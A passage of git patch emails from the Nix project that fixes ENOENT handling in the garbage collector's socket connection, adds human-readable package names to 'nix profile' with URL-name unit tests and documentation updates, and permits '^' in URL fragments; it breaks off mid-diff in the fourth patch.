From c5fdbdae321903740e0e735aa89fab5647992687 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 19 Jun 2023 16:54:05 +0200 Subject: [PATCH 001/654] LocalStore::addTempRoot(): Handle ENOENT If the garbage collector has acquired the global GC lock, but hasn't created the GC socket yet, then a client attempting to connect would get ENOENT. Note that this only happens when the GC runs for the first time on a machine. Subsequently clients will get ECONNREFUSED which was already handled. Fixes #7370. --- src/libstore/gc.cc | 13 +++++++++---- tests/gc-non-blocking.sh | 7 ++++++- 2 files changed, 15 insertions(+), 5 deletions(-) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 0038ec802..b5b9e2049 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -138,9 +138,9 @@ void LocalStore::addTempRoot(const StorePath & path) try { nix::connect(fdRootsSocket->get(), socketPath); } catch (SysError & e) { - /* The garbage collector may have exited, so we need to - restart. */ - if (e.errNo == ECONNREFUSED) { + /* The garbage collector may have exited or not + created the socket yet, so we need to restart. */ + if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) { debug("GC socket connection refused"); fdRootsSocket->close(); goto restart; @@ -503,6 +503,11 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) auto fdGCLock = openGCLock(); FdLock gcLock(fdGCLock.get(), ltWrite, true, "waiting for the big garbage collector lock..."); + /* Synchronisation point to test ENOENT handling in + addTempRoot(), see tests/gc-non-blocking.sh. */ + if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + readFile(*p); + /* Start the server for receiving new roots. */ auto socketPath = stateDir.get() + gcSocketPath; createDirs(dirOf(socketPath)); @@ -772,7 +777,7 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) } }; - /* Synchronisation point for testing, see tests/gc-concurrent.sh. 
*/ + /* Synchronisation point for testing, see tests/gc-non-blocking.sh. */ if (auto p = getEnv("_NIX_TEST_GC_SYNC")) readFile(*p); diff --git a/tests/gc-non-blocking.sh b/tests/gc-non-blocking.sh index 0d781485d..da6dbdf5d 100644 --- a/tests/gc-non-blocking.sh +++ b/tests/gc-non-blocking.sh @@ -9,16 +9,21 @@ clearStore fifo=$TEST_ROOT/test.fifo mkfifo "$fifo" +fifo2=$TEST_ROOT/test2.fifo +mkfifo "$fifo2" + dummy=$(nix store add-path ./simple.nix) running=$TEST_ROOT/running touch $running -(_NIX_TEST_GC_SYNC=$fifo nix-store --gc -vvvvv; rm $running) & +(_NIX_TEST_GC_SYNC=$fifo _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & pid=$! sleep 2 +(sleep 1; echo > $fifo2) & + outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; mkDerivation { From 3859b425975d0347e724b6abb513662667b3e8c7 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 21 Jun 2023 16:17:21 +0200 Subject: [PATCH 002/654] Wait for pid --- tests/gc-non-blocking.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/gc-non-blocking.sh b/tests/gc-non-blocking.sh index da6dbdf5d..7f2aebb8b 100644 --- a/tests/gc-non-blocking.sh +++ b/tests/gc-non-blocking.sh @@ -23,6 +23,7 @@ pid=$! sleep 2 (sleep 1; echo > $fifo2) & +pid2=$! outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; @@ -32,6 +33,7 @@ outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " }") wait $pid +wait $pid2 (! test -e $running) (! 
test -e $dummy) From 257b768436a0e8ab7887f9b790c5b92a7fe51ef5 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Sun, 9 Jul 2023 22:16:21 +0200 Subject: [PATCH 003/654] Enable using human-readable name in nix profile --- doc/manual/src/release-notes/rl-next.md | 2 + src/libutil/tests/url-name.cc | 64 ++++++++++ src/libutil/url-name.cc | 46 +++++++ src/libutil/url-name.hh | 20 +++ src/nix/profile-list.md | 10 +- src/nix/profile-remove.md | 15 +-- src/nix/profile-upgrade.md | 10 +- src/nix/profile.cc | 160 ++++++++++++++++-------- tests/functional/nix-profile.sh | 21 ++-- 9 files changed, 274 insertions(+), 74 deletions(-) create mode 100644 src/libutil/tests/url-name.cc create mode 100644 src/libutil/url-name.cc create mode 100644 src/libutil/url-name.hh diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md index 85e180e37..d50da32cd 100644 --- a/doc/manual/src/release-notes/rl-next.md +++ b/doc/manual/src/release-notes/rl-next.md @@ -64,3 +64,5 @@ ``` This makes it match `nix derivation show`, which also maps store paths to information. + +- [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Indices are deprecated and will be removed in a future version. 
diff --git a/src/libutil/tests/url-name.cc b/src/libutil/tests/url-name.cc new file mode 100644 index 000000000..6ee66e826 --- /dev/null +++ b/src/libutil/tests/url-name.cc @@ -0,0 +1,64 @@ +#include "url-name.hh" +#include + +namespace nix { + +/* ----------- tests for url-name.hh --------------------------------------------------*/ + + TEST(getNameFromURL, getsNameFromURL) { + ASSERT_EQ(getNameFromURL(parseURL("path:/home/user/project")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + ASSERT_EQ(getNameFromURL(parseURL("github:edolstra/nix-warez?rev=1234&dir=blender&ref=master")), "blender"); + + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + + 
ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + + ASSERT_EQ(getNameFromURL(parseURL("git://github.com/edolstra/dwarffs")), "dwarffs"); + ASSERT_EQ(getNameFromURL(parseURL("git://github.com/edolstra/nix-warez?dir=blender")), "blender"); + ASSERT_EQ(getNameFromURL(parseURL("git+file:///home/user/project")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("git+file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("git+ssh://git@github.com/someuser/my-repo#")), "my-repo"); + ASSERT_EQ(getNameFromURL(parseURL("git+git://github.com/someuser/my-repo?rev=v1.2.3")), "my-repo"); + ASSERT_EQ(getNameFromURL(parseURL("git+ssh:///home/user/project?dir=subproject&rev=v2.4")), "subproject"); + ASSERT_EQ(getNameFromURL(parseURL("git+http://not-even-real#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("git+https://not-even-real#packages.aarch64-darwin.hello")), "hello"); + + ASSERT_EQ(getNameFromURL(parseURL("tarball+http://github.com/NixOS/nix/archive/refs/tags/2.18.1#packages.x86_64-linux.jq")), "jq"); + ASSERT_EQ(getNameFromURL(parseURL("tarball+https://github.com/NixOS/nix/archive/refs/tags/2.18.1#packages.x86_64-linux.hg")), "hg"); + ASSERT_EQ(getNameFromURL(parseURL("tarball+file:///home/user/Downloads/nixpkgs-2.18.1#packages.aarch64-darwin.ripgrep")), "ripgrep"); + + ASSERT_EQ(getNameFromURL(parseURL("https://github.com/NixOS/nix/archive/refs/tags/2.18.1.tar.gz#packages.x86_64-linux.pv")), "pv"); + 
ASSERT_EQ(getNameFromURL(parseURL("http://github.com/NixOS/nix/archive/refs/tags/2.18.1.tar.gz#packages.x86_64-linux.pv")), "pv"); + + ASSERT_EQ(getNameFromURL(parseURL("file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("file+file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("file+http://not-even-real#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("file+http://gitfantasy.com/org/user/notaflake")), "notaflake"); + ASSERT_EQ(getNameFromURL(parseURL("file+https://not-even-real#packages.aarch64-darwin.hello")), "hello"); + + ASSERT_EQ(getNameFromURL(parseURL("https://www.github.com/")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("file:.#")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default")), std::nullopt); + } +} diff --git a/src/libutil/url-name.cc b/src/libutil/url-name.cc new file mode 100644 index 000000000..ab65e78df --- /dev/null +++ b/src/libutil/url-name.cc @@ -0,0 +1,46 @@ +#include "url-name.hh" +#include +#include + +namespace nix { + +static const std::string attributeNamePattern("[a-z0-9_-]+"); +static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")"); +static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); +static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); +static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?"); +static const std::regex gitProviderRegex("github|gitlab|sourcehut"); +static const std::regex gitSchemeRegex("git($|\\+.*)"); + +std::optional getNameFromURL(ParsedURL url) { + std::smatch match; + + /* If there is a dir= argument, use its value */ + if (url.query.count("dir") > 0) + return url.query.at("dir"); + + /* If the fragment isn't a "default" and 
contains two attribute elements, use the last one */ + if (std::regex_match(url.fragment, match, lastAttributeRegex)) + return match.str(1); + + /* If this is a github/gitlab/sourcehut flake, use the repo name */ + if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) + return match.str(1); + + /* If it is a regular git flake, use the directory name */ + if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); + + /* If everything failed but there is a non-default fragment, use it in full */ + if (!url.fragment.empty() && !hasSuffix(url.fragment, "default")) + return url.fragment; + + /* If there is no fragment, take the last element of the path */ + if (std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); + + /* If even that didn't work, the URL does not contain enough info to determine a useful name */ + return {}; +} + +} diff --git a/src/libutil/url-name.hh b/src/libutil/url-name.hh new file mode 100644 index 000000000..188b951e5 --- /dev/null +++ b/src/libutil/url-name.hh @@ -0,0 +1,20 @@ +#include "url.hh" +#include "url-parts.hh" +#include "util.hh" +#include "split.hh" + +namespace nix { + +/** + * Try to extract a reasonably unique and meaningful, human-readable + * name of a flake output from a parsed URL. + * When nullopt is returned, the callsite should use information available + * to it outside of the URL to determine a useful name. + * This is a heuristic approach intended for user interfaces. + * @return nullopt if the extracted name is not useful to identify a + * flake output, for example because it is empty or "default". + * Otherwise returns the extracted name. 
+ */ +std::optional getNameFromURL(ParsedURL url); + +} diff --git a/src/nix/profile-list.md b/src/nix/profile-list.md index 5d7fcc0ec..facfdf0d6 100644 --- a/src/nix/profile-list.md +++ b/src/nix/profile-list.md @@ -6,12 +6,14 @@ R""( ```console # nix profile list + Name: gdb Index: 0 Flake attribute: legacyPackages.x86_64-linux.gdb Original flake URL: flake:nixpkgs Locked flake URL: github:NixOS/nixpkgs/7b38b03d76ab71bdc8dc325e3f6338d984cc35ca Store paths: /nix/store/indzcw5wvlhx6vwk7k4iq29q15chvr3d-gdb-11.1 + Name: blender-bin Index: 1 Flake attribute: packages.x86_64-linux.default Original flake URL: flake:blender-bin @@ -26,7 +28,7 @@ R""( # nix build github:edolstra/nix-warez/91f2ffee657bf834e4475865ae336e2379282d34?dir=blender#packages.x86_64-linux.default ``` - will build the package with index 1 shown above. + will build the package `blender-bin` shown above. # Description @@ -34,10 +36,14 @@ This command shows what packages are currently installed in a profile. For each installed package, it shows the following information: -* `Index`: An integer that can be used to unambiguously identify the +* `Name`: A unique name used to unambiguously identify the package in invocations of `nix profile remove` and `nix profile upgrade`. +* `Index`: An integer that can be used to unambiguously identify the + package in invocations of `nix profile remove` and `nix profile upgrade`. + (*Deprecated, will be removed in a future version in favor of `Name`.*) + * `Flake attribute`: The flake output attribute path that provides the package (e.g. `packages.x86_64-linux.hello`). 
diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md index ba85441d8..c994b79bd 100644 --- a/src/nix/profile-remove.md +++ b/src/nix/profile-remove.md @@ -2,18 +2,19 @@ R""( # Examples -* Remove a package by position: +* Remove a package by name: + + ```console + # nix profile remove hello + ``` + +* Remove a package by index + *(deprecated, will be removed in a future version)*: ```console # nix profile remove 3 ``` -* Remove a package by attribute path: - - ```console - # nix profile remove packages.x86_64-linux.hello - ``` - * Remove all packages: ```console diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md index 39cca428b..47103edfc 100644 --- a/src/nix/profile-upgrade.md +++ b/src/nix/profile-upgrade.md @@ -9,18 +9,16 @@ R""( # nix profile upgrade '.*' ``` -* Upgrade a specific package: +* Upgrade a specific package by name: ```console - # nix profile upgrade packages.x86_64-linux.hello + # nix profile upgrade hello ``` -* Upgrade a specific profile element by number: +* Upgrade a specific package by index + *(deprecated, will be removed in a future version)*: ```console - # nix profile list - 0 flake:nixpkgs#legacyPackages.x86_64-linux.spotify … - # nix profile upgrade 0 ``` diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 476ddcd60..48a481858 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -10,6 +10,8 @@ #include "../nix-env/user-env.hh" #include "profiles.hh" #include "names.hh" +#include "url.hh" +#include "url-name.hh" #include #include @@ -43,6 +45,7 @@ const int defaultPriority = 5; struct ProfileElement { StorePathSet storePaths; + std::string name; std::optional source; bool active = true; int priority = defaultPriority; @@ -116,6 +119,8 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); + /* Keep track of alreay found names to allow preventing duplicates */ + std::set foundNames; auto version = json.value("version", 0); std::string 
sUrl; @@ -149,6 +154,25 @@ struct ProfileManifest e["outputs"].get() }; } + + std::string nameCandidate = element.identifier(); + if (e.contains("name")) { + nameCandidate = e["name"]; + } + else if (element.source) { + auto url = parseURL(element.source->to_string()); + auto name = getNameFromURL(url); + if (name) + nameCandidate = *name; + } + + auto finalName = nameCandidate; + for (int i = 1; foundNames.contains(finalName); ++i) { + finalName = nameCandidate + std::to_string(i); + } + element.name = finalName; + foundNames.insert(element.name); + elements.emplace_back(std::move(element)); } } @@ -163,6 +187,7 @@ struct ProfileManifest for (auto & drvInfo : drvInfos) { ProfileElement element; element.storePaths = {drvInfo.queryOutPath()}; + element.name = element.identifier(); elements.emplace_back(std::move(element)); } } @@ -451,15 +476,25 @@ public: { std::vector res; + auto anyIndexMatchers = false; + for (auto & s : _matchers) { - if (auto n = string2Int(s)) + if (auto n = string2Int(s)) { res.push_back(*n); + anyIndexMatchers = true; + } else if (store->isStorePath(s)) res.push_back(s); else res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)}); } + if (anyIndexMatchers) { + warn("Indices are deprecated and will be removed in a future version!\n" + " Refer to packages by their `Name` as printed by `nix profile list`.\n" + " See https://github.com/NixOS/nix/issues/9171 for more information."); + } + return res; } @@ -471,8 +506,7 @@ public: } else if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { - if (element.source - && std::regex_match(element.source->attrPath, regex->reg)) + if (std::regex_match(element.name, regex->reg)) return true; } } @@ -556,62 +590,83 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf Installables installables; std::vector indices; + auto matchedCount = 0; 
auto upgradedCount = 0; for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); - if (element.source - && !element.source->originalRef.input.isLocked() - && matches(*store, element, i, matchers)) - { - upgradedCount++; - - Activity act(*logger, lvlChatty, actUnknown, - fmt("checking '%s' for updates", element.source->attrPath)); - - auto installable = make_ref( - this, - getEvalState(), - FlakeRef(element.source->originalRef), - "", - element.source->outputs, - Strings{element.source->attrPath}, - Strings{}, - lockFlags); - - auto derivedPaths = installable->toDerivedPaths(); - if (derivedPaths.empty()) continue; - auto * infop = dynamic_cast(&*derivedPaths[0].info); - // `InstallableFlake` should use `ExtraPathInfoFlake`. - assert(infop); - auto & info = *infop; - - if (element.source->lockedRef == info.flake.lockedRef) continue; - - printInfo("upgrading '%s' from flake '%s' to '%s'", - element.source->attrPath, element.source->lockedRef, info.flake.lockedRef); - - element.source = ProfileElementSource { - .originalRef = installable->flakeRef, - .lockedRef = info.flake.lockedRef, - .attrPath = info.value.attrPath, - .outputs = installable->extendedOutputsSpec, - }; - - installables.push_back(installable); - indices.push_back(i); + if (!matches(*store, element, i, matchers)) { + continue; } + + matchedCount++; + + if (!element.source) { + warn( + "Found package '%s', but it was not installed from a flake, so it can't be checked for upgrades!", + element.identifier() + ); + continue; + } + if (element.source->originalRef.input.isLocked()) { + warn( + "Found package '%s', but it was installed from a locked flake reference so it can't be upgraded!", + element.identifier() + ); + continue; + } + + upgradedCount++; + + Activity act(*logger, lvlChatty, actUnknown, + fmt("checking '%s' for updates", element.source->attrPath)); + + auto installable = make_ref( + this, + getEvalState(), + FlakeRef(element.source->originalRef), + "", + 
element.source->outputs, + Strings{element.source->attrPath}, + Strings{}, + lockFlags); + + auto derivedPaths = installable->toDerivedPaths(); + if (derivedPaths.empty()) continue; + auto * infop = dynamic_cast(&*derivedPaths[0].info); + // `InstallableFlake` should use `ExtraPathInfoFlake`. + assert(infop); + auto & info = *infop; + + if (element.source->lockedRef == info.flake.lockedRef) continue; + + printInfo("upgrading '%s' from flake '%s' to '%s'", + element.source->attrPath, element.source->lockedRef, info.flake.lockedRef); + + element.source = ProfileElementSource { + .originalRef = installable->flakeRef, + .lockedRef = info.flake.lockedRef, + .attrPath = info.value.attrPath, + .outputs = installable->extendedOutputsSpec, + }; + + installables.push_back(installable); + indices.push_back(i); } if (upgradedCount == 0) { - for (auto & matcher : matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ - warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ - warn("'%s' does not match any packages", regex->pattern); + if (matchedCount == 0) { + for (auto & matcher : matchers) { + if (const size_t * index = std::get_if(&matcher)){ + warn("'%d' is not a valid index", *index); + } else if (const Path * path = std::get_if(&matcher)){ + warn("'%s' does not match any paths", *path); + } else if (const RegexPattern * regex = std::get_if(&matcher)){ + warn("'%s' does not match any packages", regex->pattern); + } } + } else { + warn("Found some packages but none of them could be upgraded."); } warn ("Use 'nix profile list' to see the current profile."); } @@ -657,9 +712,10 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); if (i) logger->cout(""); - logger->cout("Index: " 
ANSI_BOLD "%s" ANSI_NORMAL "%s", - i, + logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", + element.name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); + logger->cout("Index: %s", i); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); logger->cout("Original flake URL: %s", element.source->originalRef.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 7c478a0cd..1fdbfb644 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -47,7 +47,7 @@ cp ./config.nix $flake1Dir/ # Test upgrading from nix-env. nix-env -f ./user-envs.nix -i foo-1.0 -nix profile list | grep -A2 'Index:.*0' | grep 'Store paths:.*foo-1.0' +nix profile list | grep -A2 'Name:.*foo' | grep 'Store paths:.*foo-1.0' nix profile install $flake1Dir -L nix profile list | grep -A4 'Index:.*1' | grep 'Locked flake URL:.*narHash' [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]] @@ -81,7 +81,7 @@ nix profile rollback # Test uninstall. [ -e $TEST_HOME/.nix-profile/bin/foo ] -nix profile remove 0 +nix profile remove foo (! [ -e $TEST_HOME/.nix-profile/bin/foo ]) nix profile history | grep 'foo: 1.0 -> ∅' nix profile diff-closures | grep 'Version 3 -> 4' @@ -93,6 +93,13 @@ nix profile remove 1 nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] +# Test packages with same name from different sources +mkdir $TEST_ROOT/simple-too +cp ./simple.nix ./config.nix simple.builder.sh $TEST_ROOT/simple-too +nix profile install --file $TEST_ROOT/simple-too/simple.nix '' +nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple1' +nix profile remove simple1 + # Test wipe-history. 
nix profile wipe-history [[ $(nix profile history | grep Version | wc -l) -eq 1 ]] @@ -104,7 +111,7 @@ nix profile upgrade 0 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. -nix profile remove 0 +nix profile remove flake1 printf 4.0 > $flake1Dir/version printf Utrecht > $flake1Dir/who nix profile install $flake1Dir @@ -112,26 +119,26 @@ nix profile install $flake1Dir [[ $(nix path-info --json $(realpath $TEST_HOME/.nix-profile/bin/hello) | jq -r .[].ca) =~ fixed:r:sha256: ]] # Override the outputs. -nix profile remove 0 1 +nix profile remove simple flake1 nix profile install "$flake1Dir^*" [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Utrecht" ]] [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] printf Nix > $flake1Dir/who -nix profile upgrade 0 +nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Nix" ]] [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] -nix profile remove 0 +nix profile remove flake1 nix profile install "$flake1Dir^man" (! [ -e $TEST_HOME/.nix-profile/bin/hello ]) [ -e $TEST_HOME/.nix-profile/share/man ] (! [ -e $TEST_HOME/.nix-profile/include ]) # test priority -nix profile remove 0 +nix profile remove flake1 # Make another flake. flake2Dir=$TEST_ROOT/flake2 From 9c0a09f09fbb930483b26f60f8552fbe5236b777 Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Sun, 1 Oct 2023 22:09:55 +0200 Subject: [PATCH 004/654] allow ^ in URLs Users may select specific outputs using the ^output syntax or selecting any output using ^*. URL parsing currently doesn't support these kinds of output references: parsing will fail. Currently `queryRegex` was reused for URL fragments, which didn't include support for ^. Now queryRegex has been split from fragmentRegex, where only the fragmentRegex supports ^. 
--- src/libexpr/flake/flakeref.cc | 2 +- src/libutil/tests/url-name.cc | 3 +++ src/libutil/url-name.cc | 5 +++-- src/libutil/url-parts.hh | 1 + src/libutil/url.cc | 2 +- tests/functional/nix-profile.sh | 1 + 6 files changed, 10 insertions(+), 4 deletions(-) diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc index 16f45ace7..49d6940b1 100644 --- a/src/libexpr/flake/flakeref.cc +++ b/src/libexpr/flake/flakeref.cc @@ -190,7 +190,7 @@ std::optional> parseFlakeIdRef( static std::regex flakeRegex( "((" + flakeIdRegexS + ")(?:/(?:" + refAndOrRevRegex + "))?)" - + "(?:#(" + queryRegex + "))?", + + "(?:#(" + fragmentRegex + "))?", std::regex::ECMAScript); if (std::regex_match(url, match, flakeRegex)) { diff --git a/src/libutil/tests/url-name.cc b/src/libutil/tests/url-name.cc index 6ee66e826..f637efa89 100644 --- a/src/libutil/tests/url-name.cc +++ b/src/libutil/tests/url-name.cc @@ -10,6 +10,8 @@ namespace nix { ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex"); + ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj"); ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello"); @@ -60,5 +62,6 @@ namespace nix { ASSERT_EQ(getNameFromURL(parseURL("path:.")), std::nullopt); ASSERT_EQ(getNameFromURL(parseURL("file:.#")), std::nullopt); ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default^*")), std::nullopt); } } diff --git 
a/src/libutil/url-name.cc b/src/libutil/url-name.cc index ab65e78df..f94383e32 100644 --- a/src/libutil/url-name.cc +++ b/src/libutil/url-name.cc @@ -5,12 +5,13 @@ namespace nix { static const std::string attributeNamePattern("[a-z0-9_-]+"); -static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")"); +static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?"); static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?"); static const std::regex gitProviderRegex("github|gitlab|sourcehut"); static const std::regex gitSchemeRegex("git($|\\+.*)"); +static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)"); std::optional getNameFromURL(ParsedURL url) { std::smatch match; @@ -32,7 +33,7 @@ std::optional getNameFromURL(ParsedURL url) { return match.str(1); /* If everything failed but there is a non-default fragment, use it in full */ - if (!url.fragment.empty() && !hasSuffix(url.fragment, "default")) + if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) return url.fragment; /* If there is no fragment, take the last element of the path */ diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 5c5a30dc2..59c17df34 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -19,6 +19,7 @@ const static std::string userRegex = "(?:(?:" + unreservedRegex + "|" + pctEncod const static std::string authorityRegex = "(?:" + userRegex + "@)?" + hostRegex + "(?::[0-9]+)?"; const static std::string pcharRegex = "(?:" + unreservedRegex + "|" + pctEncoded + "|" + subdelimsRegex + "|[:@])"; const static std::string queryRegex = "(?:" + pcharRegex + "|[/? 
\"])*"; +const static std::string fragmentRegex = "(?:" + pcharRegex + "|[/? \"^])*"; const static std::string segmentRegex = "(?:" + pcharRegex + "*)"; const static std::string absPathRegex = "(?:(?:/" + segmentRegex + ")*/?)"; const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRegex + ")*/?)"; diff --git a/src/libutil/url.cc b/src/libutil/url.cc index 9b438e6cd..2a0a5c839 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -15,7 +15,7 @@ ParsedURL parseURL(const std::string & url) "((" + schemeRegex + "):" + "(?:(?://(" + authorityRegex + ")(" + absPathRegex + "))|(/?" + pathRegex + ")))" + "(?:\\?(" + queryRegex + "))?" - + "(?:#(" + queryRegex + "))?", + + "(?:#(" + fragmentRegex + "))?", std::regex::ECMAScript); std::smatch match; diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 1fdbfb644..eced4d3f1 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ 